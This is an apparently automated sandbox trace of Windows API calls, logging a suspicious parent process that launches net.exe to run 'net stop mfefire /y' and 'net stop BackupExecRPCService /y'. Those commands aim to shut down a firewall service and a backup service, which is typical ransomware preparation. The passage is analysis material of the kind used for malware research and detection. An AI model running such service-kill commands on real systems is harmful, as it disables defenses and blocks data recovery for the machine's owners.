"BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 312 os_tid = 0x8c0 [0197.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efe7c | out: lpSystemTimeAsFileTime=0x1efe7c*(dwLowDateTime=0x3f278d60, dwHighDateTime=0x1d57a87)) [0197.907] GetCurrentProcessId () returned 0xa70 [0197.907] GetCurrentThreadId () returned 0x8c0 [0197.907] GetTickCount () returned 0x116b230 [0197.907] QueryPerformanceCounter (in: lpPerformanceCount=0x1efe74 | out: lpPerformanceCount=0x1efe74*=31819217216) returned 1 [0197.908] GetModuleHandleA (lpModuleName=0x0) returned 0x8e0000 [0197.908] __set_app_type (_Type=0x1) [0197.908] __p__fmode () returned 0x74eb31f4 [0197.908] __p__commode () returned 0x74eb31fc [0197.908] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8effe6) returned 0x0 [0197.908] __getmainargs (in: _Argc=0x8f9064, _Argv=0x8f906c, _Env=0x8f9068, _DoWildCard=0, _StartInfo=0x8f9024 | out: _Argc=0x8f9064, _Argv=0x8f906c, _Env=0x8f9068) returned 0 [0197.908] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0197.908] GetConsoleOutputCP () returned 0x1b5 [0197.908] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x8f9080 | out: lpCPInfo=0x8f9080) returned 1 [0197.909] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.911] sprintf_s (in: _DstBuf=0x1efe34, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0197.912] setlocale (category=0, locale=".437") returned="English_United States.437" [0197.913] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0197.913] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0197.913] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mfefire /y" [0197.913] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1efc00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0197.914] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x0, Size=0x62) returned 0x323c00 [0197.914] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0197.914] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1efe04 | out: Buffer=0x1efe04*=0x321c60) returned 0x0 [0197.914] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1efe04 | out: Buffer=0x1efe04*=0x321c78) returned 0x0 [0197.914] _fileno (_File=0x74eb2900) returned -2 [0197.914] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0197.914] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0197.914] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0197.914] _wcsicmp (_String1="config", _String2="stop") returned -16 [0197.914] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0197.914] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0197.914] _wcsicmp (_String1="file", _String2="stop") returned -13 [0197.914] _wcsicmp (_String1="files", _String2="stop") returned -13 [0197.914] _wcsicmp (_String1="group", _String2="stop") returned -12 [0197.914] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0197.914] _wcsicmp (_String1="help", _String2="stop") returned -11 [0197.914] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0197.914] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0197.914] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0197.915] _wcsicmp (_String1="session", _String2="stop") returned -15 [0197.915] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0197.915] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0197.915] _wcsicmp (_String1="share", _String2="stop") returned -12 [0197.915] _wcsicmp (_String1="start", _String2="stop") returned -14 [0197.915] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0197.915] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0197.915] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0197.915] _wcsicmp (_String1="accounts", _String2="mfefire") returned -12 [0197.915] _wcsicmp (_String1="computer", _String2="mfefire") returned -10 [0197.915] _wcsicmp (_String1="config", _String2="mfefire") returned -10 [0197.915] _wcsicmp (_String1="continue", _String2="mfefire") returned -10 [0197.915] _wcsicmp (_String1="cont", _String2="mfefire") returned -10 [0197.915] _wcsicmp (_String1="file", _String2="mfefire") returned -7 [0197.915] _wcsicmp (_String1="files", _String2="mfefire") returned -7 [0197.915] _wcsicmp (_String1="group", _String2="mfefire") returned -6 [0197.915] _wcsicmp (_String1="groups", _String2="mfefire") returned -6 [0197.915] _wcsicmp (_String1="help", _String2="mfefire") returned -5 [0197.915] _wcsicmp (_String1="helpmsg", _String2="mfefire") returned -5 [0197.915] _wcsicmp (_String1="localgroup", _String2="mfefire") returned -1 [0197.915] _wcsicmp (_String1="pause", _String2="mfefire") returned 3 [0197.915] _wcsicmp (_String1="session", _String2="mfefire") returned 6 [0197.915] _wcsicmp (_String1="sessions", _String2="mfefire") returned 6 [0197.915] _wcsicmp (_String1="sess", _String2="mfefire") returned 6 [0197.915] _wcsicmp (_String1="share", _String2="mfefire") returned 6 [0197.915] _wcsicmp (_String1="start", _String2="mfefire") returned 6 [0197.915] _wcsicmp (_String1="stats", _String2="mfefire") returned 6 [0197.915] _wcsicmp (_String1="statistics", _String2="mfefire") returned 6 [0197.915] _wcsicmp (_String1="stop", _String2="mfefire") returned 6 [0197.915] _wcsicmp (_String1="time", _String2="mfefire") returned 7 [0197.915] _wcsicmp (_String1="user", _String2="mfefire") returned 8 [0197.915] _wcsicmp (_String1="users", _String2="mfefire") returned 8 [0197.915] _wcsicmp (_String1="msg", _String2="mfefire") returned 13 [0197.915] _wcsicmp (_String1="messenger", _String2="mfefire") returned -1 [0197.915] _wcsicmp (_String1="receiver", _String2="mfefire") returned 5 [0197.915] _wcsicmp (_String1="rcv", _String2="mfefire") returned 5 [0197.915] _wcsicmp (_String1="netpopup", _String2="mfefire") returned 1 [0197.915] _wcsicmp (_String1="redirector", _String2="mfefire") returned 5 [0197.916] _wcsicmp (_String1="redir", _String2="mfefire") returned 5 [0197.916] _wcsicmp (_String1="rdr", _String2="mfefire") returned 5 [0197.916] _wcsicmp (_String1="workstation", _String2="mfefire") returned 10 [0197.916] _wcsicmp (_String1="work", _String2="mfefire") returned 10 [0197.916] _wcsicmp (_String1="wksta", _String2="mfefire") returned 10 [0197.916] _wcsicmp (_String1="prdr", _String2="mfefire") returned 3 [0197.916] _wcsicmp (_String1="devrdr", _String2="mfefire") returned -9 [0197.916] _wcsicmp (_String1="lanmanworkstation", _String2="mfefire") returned -1 [0197.916] _wcsicmp (_String1="server", _String2="mfefire") returned 6 [0197.916] _wcsicmp (_String1="svr", _String2="mfefire") returned 6 [0197.916] _wcsicmp (_String1="srv", _String2="mfefire") returned 6 [0197.916] _wcsicmp (_String1="lanmanserver", _String2="mfefire") returned -1 [0197.916] _wcsicmp (_String1="alerter", _String2="mfefire") returned -12 [0197.916] _wcsicmp (_String1="netlogon", _String2="mfefire") returned 1 [0197.916] _wcsupr (in: _String="mfefire" | out: _String="MFEFIRE") returned="MFEFIRE" [0197.916] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3254b8 [0197.919] GetServiceKeyNameW (in: hSCManager=0x3254b8, lpDisplayName="MFEFIRE", lpServiceName=0x8faaf0, lpcchBuffer=0x1efda0 | out: lpServiceName="", lpcchBuffer=0x1efda0) returned 0 [0197.919] _wcsicmp (_String1="msg", _String2="MFEFIRE") returned 13 [0197.919] _wcsicmp (_String1="messenger", _String2="MFEFIRE") returned -1 [0197.919] _wcsicmp (_String1="receiver", _String2="MFEFIRE") returned 5 [0197.919] _wcsicmp (_String1="rcv", _String2="MFEFIRE") returned 5 [0197.919] _wcsicmp (_String1="redirector", _String2="MFEFIRE") returned 5 [0197.919] _wcsicmp (_String1="redir", _String2="MFEFIRE") returned 5 [0197.919] _wcsicmp (_String1="rdr", _String2="MFEFIRE") returned 5 [0197.919] _wcsicmp (_String1="workstation", _String2="MFEFIRE") returned 10 [0197.920] _wcsicmp (_String1="work", _String2="MFEFIRE") returned 10 [0197.920] _wcsicmp (_String1="wksta", _String2="MFEFIRE") returned 10 [0197.920] _wcsicmp (_String1="prdr", _String2="MFEFIRE") returned 3 [0197.920] _wcsicmp (_String1="devrdr", _String2="MFEFIRE") returned -9 [0197.920] _wcsicmp (_String1="lanmanworkstation", _String2="MFEFIRE") returned -1 [0197.920] _wcsicmp (_String1="server", _String2="MFEFIRE") returned 6 [0197.920] _wcsicmp (_String1="svr", _String2="MFEFIRE") returned 6 [0197.920] _wcsicmp (_String1="srv", _String2="MFEFIRE") returned 6 [0197.920] _wcsicmp (_String1="lanmanserver", _String2="MFEFIRE") returned -1 [0197.920] _wcsicmp (_String1="alerter", _String2="MFEFIRE") returned -12 [0197.920] _wcsicmp (_String1="netlogon", _String2="MFEFIRE") returned 1 [0197.920] NetServiceControl (in: servername=0x0, service="MFEFIRE", opcode=0x0, arg=0x0, bufptr=0x1efd9c | out: bufptr=0x1efd9c) returned 0x889 [0197.921] wcscpy_s (in: _Destination=0x8fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0197.921] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0197.922] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x8fb338, nSize=0x800, Arguments=0x8f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0197.923] GetFileType (hFile=0x26c) returned 0x3 [0197.923] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x323fe8 [0197.923] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x323fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0197.923] WriteFile (in: hFile=0x26c, lpBuffer=0x323fe8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1efcdc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efcdc, lpOverlapped=0x0) returned 0 [0197.923] LocalFree (hMem=0x323fe8) returned 0x0 [0197.923] GetFileType (hFile=0x26c) returned 0x3 [0197.923] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x326290 [0197.923] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x326290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n2", lpUsedDefaultChar=0x0) returned 2 [0197.923] WriteFile (in: hFile=0x26c, lpBuffer=0x326290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1efcdc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efcdc, lpOverlapped=0x0) returned 0 [0197.923] LocalFree (hMem=0x326290) returned 0x0 [0197.923] _ultow (in: _Dest=0x889, _Radix=2030860 | out: _Dest=0x889) returned="2185" [0197.923] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x8fb338, nSize=0x800, Arguments=0x8f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0197.923] GetFileType (hFile=0x26c) returned 0x3 [0197.923] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x326290 [0197.923] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x326290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0197.923] WriteFile (in: hFile=0x26c, lpBuffer=0x326290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1efce8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efce8, lpOverlapped=0x0) returned 0 [0197.923] LocalFree (hMem=0x326290) returned 0x0 [0197.923] GetFileType (hFile=0x26c) returned 0x3 [0197.923] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x326290 [0197.923] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x326290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n2", lpUsedDefaultChar=0x0) returned 2 [0197.923] WriteFile (in: hFile=0x26c, lpBuffer=0x326290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1efce8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efce8, lpOverlapped=0x0) returned 0 [0197.923] LocalFree (hMem=0x326290) returned 0x0 [0197.924] NetApiBufferFree (Buffer=0x321c60) returned 0x0 [0197.924] NetApiBufferFree (Buffer=0x321c78) returned 0x0 [0197.924] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mfefire /y" [0197.924] exit (_Code=2) Process: id = "140" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x51522000" os_pid = "0x9f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop BackupExecRPCService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 313 os_tid = 0xa04 Process: id = "141" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5c498000" os_pid = "0x8c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "140" os_parent_pid = "0x9f8" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecRPCService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 314 os_tid = 0xb0 [0198.063] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fbb0 | out: lpSystemTimeAsFileTime=0x30fbb0*(dwLowDateTime=0x3f3f5b20, dwHighDateTime=0x1d57a87)) [0198.063] GetCurrentProcessId () returned 0x8c4 [0198.063] GetCurrentThreadId () returned 0xb0 [0198.063] GetTickCount () returned 0x116b2cc [0198.063] QueryPerformanceCounter (in: lpPerformanceCount=0x30fba8 | out: lpPerformanceCount=0x30fba8*=31834748094) returned 1 [0198.063] GetModuleHandleA (lpModuleName=0x0) returned 0xda0000 [0198.063] __set_app_type (_Type=0x1) [0198.063] __p__fmode () returned 0x74eb31f4 [0198.063] __p__commode () returned 0x74eb31fc [0198.063] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xdaffe6) returned 0x0 [0198.063] __getmainargs (in: _Argc=0xdb9064, _Argv=0xdb906c, _Env=0xdb9068, _DoWildCard=0, _StartInfo=0xdb9024 | out: _Argc=0xdb9064, _Argv=0xdb906c, _Env=0xdb9068) returned 0 [0198.064] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0198.064] GetConsoleOutputCP () returned 0x1b5 [0198.064] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xdb9080 | out: lpCPInfo=0xdb9080) returned 1 [0198.064] SetThreadUILanguage (LangId=0x0) returned 0x409 [0198.067] sprintf_s (in: _DstBuf=0x30fb68, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0198.067] setlocale (category=0, locale=".437") returned="English_United States.437" [0198.069] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0198.069] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0198.069] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecRPCService /y" [0198.069] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30f934, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0198.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7c) returned 0x643c20 [0198.069] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0198.069] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30fb38 | out: Buffer=0x30fb38*=0x641c80) returned 0x0 [0198.069] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30fb38 | out: Buffer=0x30fb38*=0x641c98) returned 0x0 [0198.070] _fileno (_File=0x74eb2900) returned -2 [0198.070] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0198.070] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0198.070] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0198.070] _wcsicmp (_String1="config", _String2="stop") returned -16 [0198.070] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0198.070] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0198.070] _wcsicmp (_String1="file", _String2="stop") returned -13 [0198.070] _wcsicmp (_String1="files", _String2="stop") returned -13 [0198.070] _wcsicmp (_String1="group", _String2="stop") returned -12 [0198.070] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0198.070] _wcsicmp (_String1="help", _String2="stop") returned -11 [0198.070] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0198.070] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0198.070] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0198.070] _wcsicmp (_String1="session", _String2="stop") returned -15 [0198.070] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0198.070] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0198.070] _wcsicmp (_String1="share", _String2="stop") returned -12 [0198.070] _wcsicmp (_String1="start", _String2="stop") returned -14 [0198.070] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0198.070] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0198.070] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0198.070] _wcsicmp (_String1="accounts", _String2="BackupExecRPCService") returned -1 [0198.070] _wcsicmp (_String1="computer", _String2="BackupExecRPCService") returned 1 [0198.070] _wcsicmp (_String1="config", _String2="BackupExecRPCService") returned 1 [0198.070] _wcsicmp (_String1="continue", _String2="BackupExecRPCService") returned 1 [0198.070] _wcsicmp (_String1="cont", _String2="BackupExecRPCService") returned 1 [0198.070] _wcsicmp (_String1="file", _String2="BackupExecRPCService") returned 4 [0198.070] _wcsicmp (_String1="files", _String2="BackupExecRPCService") returned 4 [0198.070] _wcsicmp (_String1="group", _String2="BackupExecRPCService") returned 5 [0198.070] _wcsicmp (_String1="groups", _String2="BackupExecRPCService") returned 5 [0198.070] _wcsicmp (_String1="help", _String2="BackupExecRPCService") returned 6 [0198.071] _wcsicmp (_String1="helpmsg", _String2="BackupExecRPCService") returned 6 [0198.071] _wcsicmp (_String1="localgroup", _String2="BackupExecRPCService") returned 10 [0198.071] _wcsicmp (_String1="pause", _String2="BackupExecRPCService") returned 14 [0198.071] _wcsicmp (_String1="session", _String2="BackupExecRPCService") returned 17 [0198.071] _wcsicmp (_String1="sessions", _String2="BackupExecRPCService") returned 17 [0198.071] _wcsicmp (_String1="sess", _String2="BackupExecRPCService") returned 17 [0198.071] _wcsicmp (_String1="share", _String2="BackupExecRPCService") returned 17 [0198.071] _wcsicmp (_String1="start", _String2="BackupExecRPCService") returned 17 [0198.071] _wcsicmp (_String1="stats", _String2="BackupExecRPCService") returned 17 [0198.071] _wcsicmp (_String1="statistics", _String2="BackupExecRPCService") returned 17 [0198.071] _wcsicmp (_String1="stop", _String2="BackupExecRPCService") returned 17 [0198.071] _wcsicmp (_String1="time", _String2="BackupExecRPCService") returned 18 [0198.071] _wcsicmp (_String1="user", _String2="BackupExecRPCService") returned 19 [0198.071] _wcsicmp (_String1="users", _String2="BackupExecRPCService") returned 19 [0198.071] _wcsicmp (_String1="msg", _String2="BackupExecRPCService") returned 11 [0198.071] _wcsicmp (_String1="messenger", _String2="BackupExecRPCService") returned 11 [0198.071] _wcsicmp (_String1="receiver", _String2="BackupExecRPCService") returned 16 [0198.071] _wcsicmp (_String1="rcv", _String2="BackupExecRPCService") returned 16 [0198.071] _wcsicmp (_String1="netpopup", _String2="BackupExecRPCService") returned 12 [0198.071] _wcsicmp (_String1="redirector", _String2="BackupExecRPCService") returned 16 [0198.071] _wcsicmp (_String1="redir", _String2="BackupExecRPCService") returned 16 [0198.071] _wcsicmp (_String1="rdr", _String2="BackupExecRPCService") returned 16 [0198.071] _wcsicmp (_String1="workstation", _String2="BackupExecRPCService") returned 21 [0198.071] _wcsicmp (_String1="work", _String2="BackupExecRPCService") returned 21 [0198.071] _wcsicmp (_String1="wksta", _String2="BackupExecRPCService") returned 21 [0198.071] _wcsicmp (_String1="prdr", _String2="BackupExecRPCService") returned 14 [0198.071] _wcsicmp (_String1="devrdr", _String2="BackupExecRPCService") returned 2 [0198.071] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecRPCService") returned 10 [0198.071] _wcsicmp (_String1="server", _String2="BackupExecRPCService") returned 17 [0198.071] _wcsicmp (_String1="svr", _String2="BackupExecRPCService") returned 17 [0198.071] _wcsicmp (_String1="srv", _String2="BackupExecRPCService") returned 17 [0198.071] _wcsicmp (_String1="lanmanserver", _String2="BackupExecRPCService") returned 10 [0198.071] _wcsicmp (_String1="alerter", _String2="BackupExecRPCService") returned -1 [0198.071] _wcsicmp (_String1="netlogon", _String2="BackupExecRPCService") returned 12 [0198.072] _wcsupr (in: _String="BackupExecRPCService" | out: _String="BACKUPEXECRPCSERVICE") returned="BACKUPEXECRPCSERVICE" [0198.072] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6454f0 [0198.074] GetServiceKeyNameW (in: hSCManager=0x6454f0, lpDisplayName="BACKUPEXECRPCSERVICE", lpServiceName=0xdbaaf0, lpcchBuffer=0x30fad4 | out: lpServiceName="", lpcchBuffer=0x30fad4) returned 0 [0198.075] _wcsicmp (_String1="msg", _String2="BACKUPEXECRPCSERVICE") returned 11 [0198.075] _wcsicmp (_String1="messenger", _String2="BACKUPEXECRPCSERVICE") returned 11 [0198.075] _wcsicmp (_String1="receiver", _String2="BACKUPEXECRPCSERVICE") returned 16 [0198.075] _wcsicmp (_String1="rcv", _String2="BACKUPEXECRPCSERVICE") returned 16 [0198.075] _wcsicmp (_String1="redirector", _String2="BACKUPEXECRPCSERVICE") returned 16 [0198.075] _wcsicmp (_String1="redir", _String2="BACKUPEXECRPCSERVICE") returned 16 [0198.075] _wcsicmp (_String1="rdr", _String2="BACKUPEXECRPCSERVICE") returned 16 [0198.075] _wcsicmp (_String1="workstation", _String2="BACKUPEXECRPCSERVICE") returned 21 [0198.075] _wcsicmp (_String1="work", _String2="BACKUPEXECRPCSERVICE") returned 21 [0198.075] _wcsicmp (_String1="wksta", _String2="BACKUPEXECRPCSERVICE") returned 21 [0198.075] _wcsicmp (_String1="prdr", _String2="BACKUPEXECRPCSERVICE") returned 14 [0198.075] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECRPCSERVICE") returned 2 [0198.075] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECRPCSERVICE") returned 10 [0198.075] _wcsicmp (_String1="server", _String2="BACKUPEXECRPCSERVICE") returned 17 [0198.075] _wcsicmp (_String1="svr", _String2="BACKUPEXECRPCSERVICE") returned 17 [0198.075] _wcsicmp (_String1="srv", _String2="BACKUPEXECRPCSERVICE") returned 17 [0198.075] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECRPCSERVICE") returned 10 [0198.075] _wcsicmp (_String1="alerter", _String2="BACKUPEXECRPCSERVICE") returned -1 [0198.075] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECRPCSERVICE") returned 12 [0198.075] NetServiceControl (in: servername=0x0, service="BACKUPEXECRPCSERVICE", opcode=0x0, arg=0x0, bufptr=0x30fad0 | out: bufptr=0x30fad0) returned 0x889 [0198.076] wcscpy_s (in: _Destination=0xdba4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0198.076] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0198.077] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xdbb338, nSize=0x800, Arguments=0xdb9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0198.078] GetFileType (hFile=0x26c) returned 0x3 [0198.078] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x644020 [0198.078] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x644020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\nc", lpUsedDefaultChar=0x0) returned 30 [0198.078] WriteFile (in: hFile=0x26c, lpBuffer=0x644020, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x30fa10, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fa10, lpOverlapped=0x0) returned 0 [0198.078] LocalFree (hMem=0x644020) returned 0x0 [0198.078] GetFileType (hFile=0x26c) returned 0x3 [0198.078] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6462c8 [0198.078] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6462c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nd", lpUsedDefaultChar=0x0) returned 2 [0198.078] WriteFile (in: hFile=0x26c, lpBuffer=0x6462c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30fa10, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fa10, lpOverlapped=0x0) returned 0 [0198.078] LocalFree (hMem=0x6462c8) returned 0x0 [0198.078] _ultow (in: _Dest=0x889, _Radix=3209792 | out: _Dest=0x889) returned="2185" [0198.078] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xdbb338, nSize=0x800, Arguments=0xdb9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0198.078] GetFileType (hFile=0x26c) returned 0x3 [0198.079] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6462c8 [0198.079] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6462c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0198.079] WriteFile (in: hFile=0x26c, lpBuffer=0x6462c8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x30fa1c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fa1c, lpOverlapped=0x0) returned 0 [0198.079] LocalFree (hMem=0x6462c8) returned 0x0 [0198.079] GetFileType (hFile=0x26c) returned 0x3 [0198.079] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6462c8 [0198.079] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6462c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nd", lpUsedDefaultChar=0x0) returned 2 [0198.079] WriteFile (in: hFile=0x26c, lpBuffer=0x6462c8, nNumberOfBytesToWrite=0x2, 